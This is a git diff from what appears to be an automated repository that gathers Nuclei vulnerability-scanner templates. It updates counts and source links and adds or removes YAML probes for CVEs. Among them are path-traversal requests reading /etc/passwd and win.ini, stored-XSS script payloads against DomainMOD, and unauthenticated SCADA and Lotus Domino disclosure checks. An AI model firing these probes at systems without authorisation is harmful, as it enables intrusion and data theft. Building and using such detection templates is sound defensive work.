diff --git a/README.md b/README.md index 0234213ca2..fd51cb3eb6 100644 --- a/README.md +++ b/README.md @@ -20,21 +20,70 @@ | CVE-2016 | 249 | | CVE-2017 | 395 | | CVE-2018 | 445 | -| CVE-2019 | 512 | -| CVE-2020 | 592 | -| CVE-2021 | 1733 | +| CVE-2019 | 513 | +| CVE-2020 | 591 | +| CVE-2021 | 1731 | | CVE-2022 | 2462 | -| CVE-2023 | 4747 | -| CVE-2024 | 4733 | -| Other | 23846 | +| CVE-2023 | 4749 | +| CVE-2024 | 4759 | +| Other | 23866 | ## 近几天数量变化情况 -|2024-08-21 | 2024-08-22 | 2024-08-23 | 2024-08-24 | 2024-08-25 | 2024-08-26 | 2024-08-27| +|2024-08-22 | 2024-08-23 | 2024-08-24 | 2024-08-25 | 2024-08-26 | 2024-08-27 | 2024-08-28| |--- | ------ | ------ | ------ | ------ | ------ | ---| -|41281 | 41305 | 41313 | 41401 | 41421 | 41432 | 41435| +|41305 | 41313 | 41401 | 41421 | 41432 | 41435 | 41481| ## 最近新增文件 | templates name | | --- | -| xui-default-login.yaml | -| cookie-consent-detection.yaml | -| anything-llm.yaml | -| CVE-2024-6842.yaml | +| ilc-thickbox.yaml | +| Square-oauth-secret.yaml | +| Sendgrid-api.yaml | +| umbraco-delivery-api.yaml | +| blogintroduction-wordpress-plugin.yaml | +| mm-breaking-news.yaml | +| Pictatic-API-key.yaml | +| misiek-photo-album.yaml | +| malwared-byob.yaml | +| music-request-manager.yaml | +| couchdb-default-login.yaml | +| visual-sound.yaml | +| reviews-feed.yaml | +| Square-access-token.yaml | +| simple-headline-rotator.yaml | +| azindex.yaml | +| malwared-byob-rce.yaml | +| gixaw-chat.yaml | +| Shopify-token.yaml | +| rundeck-default-login.yaml | +| pocket-widget.yaml | +| quick-code.yaml | +| misiek-paypal.yaml | +| wccp-pro.yaml | +| jellyfin-default-login.yaml | +| CVE-2023-46818.yaml | +| CVE-2024-5827.yaml | +| CVE-2024-7818.yaml | +| CVE-2024-8197.yaml | +| CVE-2024-7687.yaml | +| CVE-2024-7820.yaml | +| CVE-2024-7860.yaml | +| CVE-2024-8046.yaml | +| CVE-2024-6019.yaml | +| CVE-2024-6017.yaml | +| CVE-2024-7817.yaml | +| CVE-2024-7688.yaml | +| CVE-2024-6690.yaml | +| CVE-2024-7918.yaml | +| CVE-2024-8054.yaml | +| CVE-2024-7791.yaml | +| CVE-2024-7304.yaml | +| CVE-2024-6804.yaml | +| CVE-2024-7822.yaml | +| CVE-2024-8199.yaml | +| CVE-2024-6688.yaml | +| CVE-2024-6018.yaml | +| CVE-2024-7861.yaml | +| CVE-2024-8056.yaml | +| CVE-2024-7862.yaml | +| CVE-2024-7816.yaml | +| CVE-2024-8200.yaml | +| CVE-2024-6693.yaml | diff --git a/data.json b/data.json index 6a1a301c43..79699d5ce8 100644 --- a/data.json +++ b/data.json @@ -171,5 +171,6 @@ "2024-08-24": 41401, "2024-08-25": 41421, "2024-08-26": 41432, - "2024-08-27": 41435 + "2024-08-27": 41435, + "2024-08-28": 41481 } \ No newline at end of file diff --git a/data1.json b/data1.json index 47143c26f6..b1ed791603 100644 --- a/data1.json +++ b/data1.json @@ -49033,5 +49033,58 @@ "xui-default-login.yaml": "2024-08-27 02:16:21", "cookie-consent-detection.yaml": "2024-08-27 02:16:21", "anything-llm.yaml": "2024-08-27 02:16:21", - "CVE-2024-6842.yaml": "2024-08-27 02:16:21" + "CVE-2024-6842.yaml": "2024-08-27 02:16:21", + "ilc-thickbox.yaml": "2024-08-28 02:17:54", + "Square-oauth-secret.yaml": "2024-08-28 02:17:54", + "Sendgrid-api.yaml": "2024-08-28 02:17:54", + "umbraco-delivery-api.yaml": "2024-08-28 02:17:54", + "blogintroduction-wordpress-plugin.yaml": "2024-08-28 02:17:54", + "mm-breaking-news.yaml": "2024-08-28 02:17:54", + "Pictatic-API-key.yaml": "2024-08-28 02:17:54", + "misiek-photo-album.yaml": "2024-08-28 02:17:54", + "malwared-byob.yaml": "2024-08-28 02:17:54", + "music-request-manager.yaml": "2024-08-28 02:17:54", + "couchdb-default-login.yaml": "2024-08-28 02:17:54", + "visual-sound.yaml": "2024-08-28 02:17:54", + "reviews-feed.yaml": "2024-08-28 02:17:54", + "Square-access-token.yaml": "2024-08-28 02:17:54", + "simple-headline-rotator.yaml": "2024-08-28 02:17:54", + "azindex.yaml": "2024-08-28 02:17:54", + "malwared-byob-rce.yaml": "2024-08-28 02:17:54", + "gixaw-chat.yaml": "2024-08-28 02:17:54", + "Shopify-token.yaml": "2024-08-28 02:17:54", + "rundeck-default-login.yaml": "2024-08-28 02:17:54", + "pocket-widget.yaml": "2024-08-28 02:17:54", + "quick-code.yaml": "2024-08-28 02:17:54", + "misiek-paypal.yaml": "2024-08-28 02:17:54", + "wccp-pro.yaml": "2024-08-28 02:17:54", + "jellyfin-default-login.yaml": "2024-08-28 02:17:54", + "CVE-2023-46818.yaml": "2024-08-28 02:17:54", + "CVE-2024-5827.yaml": "2024-08-28 02:17:54", + "CVE-2024-7818.yaml": "2024-08-28 02:17:54", + "CVE-2024-8197.yaml": "2024-08-28 02:17:54", + "CVE-2024-7687.yaml": "2024-08-28 02:17:54", + "CVE-2024-7820.yaml": "2024-08-28 02:17:54", + "CVE-2024-7860.yaml": "2024-08-28 02:17:54", + "CVE-2024-8046.yaml": "2024-08-28 02:17:54", + "CVE-2024-6019.yaml": "2024-08-28 02:17:54", + "CVE-2024-6017.yaml": "2024-08-28 02:17:54", + "CVE-2024-7817.yaml": "2024-08-28 02:17:54", + "CVE-2024-7688.yaml": "2024-08-28 02:17:54", + "CVE-2024-6690.yaml": "2024-08-28 02:17:54", + "CVE-2024-7918.yaml": "2024-08-28 02:17:54", + "CVE-2024-8054.yaml": "2024-08-28 02:17:54", + "CVE-2024-7791.yaml": "2024-08-28 02:17:54", + "CVE-2024-7304.yaml": "2024-08-28 02:17:54", + "CVE-2024-6804.yaml": "2024-08-28 02:17:54", + "CVE-2024-7822.yaml": "2024-08-28 02:17:54", + "CVE-2024-8199.yaml": "2024-08-28 02:17:54", + "CVE-2024-6688.yaml": "2024-08-28 02:17:54", + "CVE-2024-6018.yaml": "2024-08-28 02:17:54", + "CVE-2024-7861.yaml": "2024-08-28 02:17:54", + "CVE-2024-8056.yaml": "2024-08-28 02:17:54", + "CVE-2024-7862.yaml": "2024-08-28 02:17:54", + "CVE-2024-7816.yaml": "2024-08-28 02:17:54", + "CVE-2024-8200.yaml": "2024-08-28 02:17:54", + "CVE-2024-6693.yaml": "2024-08-28 02:17:54" } \ No newline at end of file diff --git a/links.csv b/links.csv index f0ea0f3e7a..6724d5b96f 100644 --- a/links.csv +++ b/links.csv @@ -444,3 +444,8 @@ https://github.com/vaampz/priv8-Nuclei https://github.com/Unrealisedd/nuclei-templates https://github.com/smn666/Nuclei_templates_2024 https://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template +https://github.com/emanueldosreis/CVE-2024-38856 +https://github.com/stvnhrlnd/umbraco-nuclei-templates +https://github.com/jhonnybonny/nuclei-templates +https://github.com/fa-rrel/Nuclei-templates-xd +https://github.com/Kuray12/prv8_nuclei_templates diff --git a/nuclei-templates/CVE-2000/CVE-2000-0114.yaml b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml new file mode 100644 index 0000000000..ecff9b7b80 --- /dev/null +++ b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml @@ -0,0 +1,32 @@ +id: CVE-2000-0114 + +info: + name: Microsoft FrontPage Extensions Check (shtml.dll) + author: r3naissance + severity: low + description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 + - https://www.exploit-db.com/exploits/19897 + classification: + cve-id: CVE-2000-0114 + remediation: Upgrade to the latest version. + tags: cve,cve2000,frontpage,microsoft,edb + +requests: + - method: GET + path: + - '{{BaseURL}}/_vti_inf.html' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "_vti_bin/shtml.dll" + +# Enhanced by mp on 2022/01/27 diff --git a/nuclei-templates/CVE-2000/cve-2000-0114.yaml b/nuclei-templates/CVE-2000/cve-2000-0114.yaml deleted file mode 100644 index 0050d0c90c..0000000000 --- a/nuclei-templates/CVE-2000/cve-2000-0114.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2000-0114 - -info: - name: Microsoft FrontPage Extensions Check (shtml.dll) - author: r3naissance - severity: low - description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - - https://www.exploit-db.com/exploits/19897 - classification: - cve-id: CVE-2000-0114 - remediation: Upgrade to the latest version. - tags: cve,cve2000,frontpage,microsoft - -requests: - - method: GET - path: - - '{{BaseURL}}/_vti_inf.html' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "_vti_bin/shtml.dll" - -# Enhanced by mp on 2022/01/27 diff --git a/nuclei-templates/CVE-2001/CVE-2001-1473.yaml b/nuclei-templates/CVE-2001/CVE-2001-1473.yaml new file mode 100644 index 0000000000..d7ad14a2d1 --- /dev/null +++ b/nuclei-templates/CVE-2001/CVE-2001-1473.yaml @@ -0,0 +1,26 @@ +id: CVE-2001-1473 +info: + name: Deprecated SSHv1 Protocol Detection + author: iamthefrogy + severity: high + tags: cve,cve2001,network,ssh,openssh + description: SSHv1 is deprecated and has known cryptographic issues. + remediation: Upgrade to SSH 2.4 or later. + reference: + - https://www.kb.cert.org/vuls/id/684820 + - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 + classification: + cvss-score: 7.4 + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cve-id: CVE-2001-1473 + cwe-id: CWE-310 +network: + - host: + - "{{Hostname}}" + - "{{Host}}:22" + matchers: + - type: word + words: + - "SSH-1" + +# Updated by Chris on 2022/01/21 diff --git a/nuclei-templates/CVE-2001/cve-2001-1473.yaml b/nuclei-templates/CVE-2001/cve-2001-1473.yaml deleted file mode 100644 index 80480efb7b..0000000000 --- a/nuclei-templates/CVE-2001/cve-2001-1473.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2001-1473 - -info: - name: Deprecated SSHv1 Protocol Detection - author: iamthefrogy - severity: high - - description: SSHv1 is deprecated and has known cryptographic issues. - reference: - - https://www.kb.cert.org/vuls/id/684820 - - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 - classification: - cvss-score: 7.4 - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N - cve-id: CVE-2001-1473 - cwe-id: CWE-310 - -network: - - host: - - "{{Hostname}}" - - "{{Host}}:22" - - matchers: - - type: word - words: - - "SSH-1" diff --git a/nuclei-templates/CVE-2004/cve-2004-0519.yaml b/nuclei-templates/CVE-2004/CVE-2004-0519.yaml similarity index 100% rename from nuclei-templates/CVE-2004/cve-2004-0519.yaml rename to nuclei-templates/CVE-2004/CVE-2004-0519.yaml diff --git a/nuclei-templates/CVE-2005/CVE-2005-2428.yaml b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml new file mode 100644 index 0000000000..c74c52c360 --- /dev/null +++ b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml @@ -0,0 +1,33 @@ +id: CVE-2005-2428 +info: + name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure + author: CasperGN + severity: medium + tags: cve,cve2005,domino + description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. + reference: + - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf + - https://www.exploit-db.com/exploits/39495 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2005-2428 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/names.nsf/People?OpenView" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + name: domino-username + regex: + - '(" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-10095.yaml b/nuclei-templates/CVE-2018/CVE-2018-10095.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10095.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10095.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10823.yaml b/nuclei-templates/CVE-2018/CVE-2018-10823.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10823.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10823.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-11409.yaml b/nuclei-templates/CVE-2018/CVE-2018-11409.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11409.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11409.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-11776.yaml b/nuclei-templates/CVE-2018/CVE-2018-11776.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11776.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11776.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12031.yaml b/nuclei-templates/CVE-2018/CVE-2018-12031.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12031.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12031.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12054.yaml b/nuclei-templates/CVE-2018/CVE-2018-12054.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12054.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12054.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12095.yaml b/nuclei-templates/CVE-2018/CVE-2018-12095.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12095.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12095.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-1271.yaml b/nuclei-templates/CVE-2018/CVE-2018-1271.yaml deleted file mode 100644 index 548327e206..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1271.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-1271 -info: - name: Spring MVC Directory Traversal Vulnerability - author: hetroublemakr - severity: medium - description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. - reference: - - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - - https://access.redhat.com/errata/RHSA-2018:1320 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2018-1271 - cwe-id: CWE-22 - tags: cve,cve2018,spring,lfi,traversal -requests: - - method: GET - path: - - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - matchers-condition: and - matchers: - - type: word - words: - - 'for 16-bit app support' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-1273.yaml b/nuclei-templates/CVE-2018/CVE-2018-1273.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-1273.yaml rename to nuclei-templates/CVE-2018/CVE-2018-1273.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-13980.yaml b/nuclei-templates/CVE-2018/CVE-2018-13980.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-13980.yaml rename to nuclei-templates/CVE-2018/CVE-2018-13980.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-14474.yaml b/nuclei-templates/CVE-2018/CVE-2018-14474.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14474.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14474.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-15517.yaml b/nuclei-templates/CVE-2018/CVE-2018-15517.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15517.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15517.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-15640.yaml b/nuclei-templates/CVE-2018/CVE-2018-15640.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15640.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15640.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-15961.yaml b/nuclei-templates/CVE-2018/CVE-2018-15961.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15961.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15961.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16167.yaml b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16167.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16167.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16288.yaml b/nuclei-templates/CVE-2018/CVE-2018-16288.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16288.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16288.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16668.yaml b/nuclei-templates/CVE-2018/CVE-2018-16668.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16668.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16668.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16670.yaml b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml new file mode 100644 index 0000000000..b253aecfda --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-16670 + +info: + name: CirCarLife SCADA PLC Status + description: PLC status disclosure due to lack of authentication + reference: + - https://www.exploit-db.com/exploits/45384 + author: geeknik + severity: medium + tags: cve,cve2018,circarlife,scada,plc,iot,disclosure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16670 + cwe-id: CWE-287 + +requests: + - method: GET + path: + - "{{BaseURL}}/services/user/values.xml?var=STATUS" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "CirCarLife Scada" + - type: word + part: body + words: + - "" + - "Reader.STATUS" + condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-16671.yaml b/nuclei-templates/CVE-2018/CVE-2018-16671.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16671.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16671.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16761.yaml b/nuclei-templates/CVE-2018/CVE-2018-16761.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16761.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16761.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16763.yaml b/nuclei-templates/CVE-2018/CVE-2018-16763.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16763.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16763.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-17422.yaml b/nuclei-templates/CVE-2018/CVE-2018-17422.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17422.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17422.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-18323.yaml b/nuclei-templates/CVE-2018/CVE-2018-18323.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-18323.yaml rename to nuclei-templates/CVE-2018/CVE-2018-18323.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml deleted file mode 100644 index 6c269ecee5..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-18778 -info: - name: mini_httpd Path Traversal - author: dhiyaneshDK - severity: medium - description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. - reference: - - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - - http://www.acme.com/software/mini_httpd/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2018-18778 - cwe-id: CWE-200 - tags: cve,cve2018,lfi,mini_httpd -requests: - - raw: - - |+ - GET /etc/passwd HTTP/1.1 - Host: - - unsafe: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/CVE-2018-19751.yaml b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml new file mode 100644 index 0000000000..e6ff1a9869 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml @@ -0,0 +1,52 @@ +id: CVE-2018-19751 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters. + reference: + - https://www.exploit-db.com/exploits/45947/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-19751 + - https://github.com/domainmod/domainmod/issues/83 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19751 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /admin/ssl-fields/add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test + - | + GET /admin/ssl-fields/ HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19752.yaml b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml new file mode 100644 index 0000000000..4876f6389a --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml @@ -0,0 +1,52 @@ +id: CVE-2018-19752 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 + - https://github.com/domainmod/domainmod/issues/84 + - https://www.exploit-db.com/exploits/45949/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19752 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/registrar.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test + - | + GET /assets/registrars.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml b/nuclei-templates/CVE-2018/CVE-2018-19892.yaml deleted file mode 100644 index 70ca1dc6b6..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2018-19892 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters. - reference: - - https://www.exploit-db.com/exploits/45959 - - https://github.com/domainmod/domainmod/issues/85 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19892 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /admin/dw/add-server.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= - - | - GET /admin/dw/servers.php HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19914.yaml b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml new file mode 100644 index 0000000000..f74e59b810 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml @@ -0,0 +1,46 @@ +id: CVE-2018-19914 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field. + reference: + - https://www.exploit-db.com/exploits/46375/ + - https://github.com/domainmod/domainmod/issues/87 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19914 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/dns.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E + - | + GET /assets/dns.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-19915.yaml b/nuclei-templates/CVE-2018/CVE-2018-19915.yaml new file mode 100644 index 0000000000..f397373f28 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19915.yaml @@ -0,0 +1,47 @@ +id: CVE-2018-19915 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through 4.11.01 has XSS via the assets/edit/host.php Web Host Name or Web Host URL field. + reference: + - https://github.com/domainmod/domainmod/issues/87 + - https://www.exploit-db.com/exploits/46376/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19915 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/host.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test + - | + GET /assets/hosting.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + 